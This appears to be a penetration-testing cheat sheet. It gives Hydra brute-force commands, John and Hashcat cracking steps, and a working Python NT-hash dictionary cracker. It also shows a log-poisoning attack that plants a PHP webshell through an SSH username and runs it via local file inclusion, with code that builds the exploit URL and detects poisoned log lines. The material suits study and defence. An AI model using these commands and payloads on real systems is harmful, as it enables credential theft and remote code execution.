💥Exploitation
the ghost in the shell
Ports and Services:
ftp <IP>
> anonymous # if anonymous login is allowed (password: blank or any e-mail address)
> ls -a # list hidden files
> binary # binary transfer mode (archives, executables, images)
> ascii # ASCII transfer mode (text only; corrupts binaries)
> get <file> # download
> put <file> # upload (check whether the writable directory is also served over HTTP)
> exit
# Password brute-force (-l one user, -L <userlist> for a list of users)
hydra -l <user> -P <wordlist> -v <IP> ftp
Brute-Force
# SSH (-l tries a single user; use -L <userlist> to fuzz usernames)
hydra -l <user> -P <wordlist_path> -vV <IP> ssh
hydra -l <user> -P <wordlist> <IP> ftp
# Login form: the target is the host, the module string is "<path>:<POST body>:<failure string>"
hydra -l <username> -P <wordlist> <IP> http-post-form "/<login_path>:user=^USER^&pass=^PASS^:<error-message>"
# ^USER^ and ^PASS^ are substituted on every attempt; the last field can be prefixed F= (failure string, default) or S= (success string)
Crack, decrypt, decode..
John (the Ripper)
unshadow <passwd.txt> <shadow.txt> > hash
john --wordlist=<wordlist_path> hash
zip2john <zip_file> > hash # same pattern for every *2john converter
keepass2john file.kdbx > hash
gpg2john private_pgp.key > hash
john --wordlist=<wordlist> --format=NT hash # pwdump format: USER:ID:LM_HASH:NT_HASH:::
# Single crack mode: candidates are derived from the username/GECOS fields, so prepend the user name to the hash ('juan:<hash>')
john --single --format=<format> <hash.txt>
Hashcat
hashcat -m <hash-mode> -a <attack-mode> <hash> <wordlist>
# -a 0 (dictionary) | -a 1 (combination) | -a 3 (mask); hashcat --example-hashes lists every mode with a sample hash
# zip: -m 13600 is WinZip (AES); classic PKZIP archives use the 17200-17230 modes
hashcat -m 13600 -a 0 <hash> <wordlist>
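What the `--format=NT` / pwdump lines above actually are, as an added example that is not part of the original notes nor john's or hashcat's code: an NT hash is plain MD4 over the UTF-16LE password with no salt, so a dictionary attack is one hash per candidate looked up against every target at once. MD4 is implemented here because hashlib on OpenSSL 3 builds often has it disabled; the pwdump lines and the wordlist are constructed samples.

```python
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (written out here; hashlib's md4 is often unavailable)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # message length in bits, little-endian

    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, additive constant, shifts, word order)
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, shifts, order in rounds:
            for i in range(16):
                a = _lrot((a + f(b, c, d) + X[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates the next one
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE password, unsalted (same password -> same hash everywhere)."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(line: str):
    """USER:ID:LM_HASH:NT_HASH::: (the line format john --format=NT expects)."""
    user, _uid, _lm, nt = line.strip().split(":")[:4]
    return user, nt.lower()


def crack_nt(pwdump_lines, wordlist):
    """Dictionary attack: hash each candidate once, look it up against all targets."""
    targets = {}
    for line in pwdump_lines:
        if line.strip():
            user, nt = parse_pwdump(line)
            targets.setdefault(nt, []).append(user)
    found = {}
    for word in wordlist:
        for user in targets.get(nt_hash(word), []):
            found[user] = word
    return found


# Constructed sample pwdump (not from any real host). juan's hash is the well-known NT hash of
# "password"; the other two are derived here from known plaintexts so the script is self-checking.
SAMPLE_PWDUMP = [
    "juan:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    f"maria:1002:aad3b435b51404eeaad3b435b51404ee:{nt_hash('Summer2024!')}:::",
    f"svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:{nt_hash('n0t-in-any-list')}:::",
]
SAMPLE_WORDLIST = ["123456", "password", "Summer2024!", "letmein"]

if __name__ == "__main__":
    for user, pw in crack_nt(SAMPLE_PWDUMP, SAMPLE_WORDLIST).items():
        print(f"{user}:{pw}")
```

svc_backup stays uncracked because its password is not in the list; that is the whole game with NT hashes, since there is no salt to slow down a precomputed or shared wordlist.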
Log Poisoning
# Payload as the SSH username: the rejected login is written verbatim to /var/log/auth.log (double quotes inside so the shell's single quotes stay balanced)
ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2
# Then include the log through the LFI; the web server's user must be able to read auth.log (often root:adm 0640, in which case this fails)
<vulnerable_param>=/var/log/auth.log&cmd=id
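The two steps above as code, as an added example that is not part of the original notes: the URL the second line is shorthand for (the LFI parameter name `page` and the base URL are assumptions), and from the defender's side a check over constructed auth.log lines that flags the poisoned username sshd writes for the `ssh '<?php ...'@host` attempt. sshd only records the username when the login fails, and the include only runs the code if the web server's user can read the log.

```python
import re
from urllib.parse import urlencode

# Constructed auth.log excerpt (not captured from a real host). Lines 2-3 are what the
# ssh '<?php ... ?>'@<IP> attempt leaves behind: sshd logs the rejected username verbatim.
SAMPLE_AUTH_LOG = """\
Mar  3 10:12:01 web01 sshd[2311]: Accepted publickey for deploy from 10.0.0.7 port 51022 ssh2
Mar  3 10:12:40 web01 sshd[2340]: Invalid user <?php system($_GET["cmd"]); ?> from 10.0.0.5 port 40212
Mar  3 10:12:40 web01 sshd[2340]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 10.0.0.5 port 40212 ssh2
Mar  3 10:13:05 web01 sshd[2355]: Failed password for root from 10.0.0.5 port 40220 ssh2
"""

# Username field of the sshd messages that echo an attacker-chosen name into the log.
SSHD_USER = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) "
    r"(?P<user>.+?) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
# Anything a PHP include would execute: <?php ... ?> or the short echo tag <?= ... ?>.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def lfi_url(base_url, lfi_param, log_path="/var/log/auth.log", cmd="id"):
    """URL that includes the poisoned log and hands the injected system() its 'cmd' argument.
    lfi_param is the vulnerable include parameter (name assumed; it depends on the target)."""
    return f"{base_url}?{urlencode({lfi_param: log_path, 'cmd': cmd}, safe='/')}"


def find_poisoned_lines(log_text):
    """Return (line number, source IP, username) for sshd entries whose username carries PHP code."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = SSHD_USER.search(line)
        if m and PHP_TAG.search(m.group("user")):
            hits.append((lineno, m.group("ip"), m.group("user")))
    return hits


if __name__ == "__main__":
    print(lfi_url("http://192.168.1.2/index.php", "page"))
    for lineno, ip, user in find_poisoned_lines(SAMPLE_AUTH_LOG):
        print(f"line {lineno}: PHP in username from {ip}: {user!r}")
```

The same username check applies to any log the web server can include (Apache access logs via the User-Agent header, mail logs via the sender address); only the regex that isolates the attacker-controlled field changes.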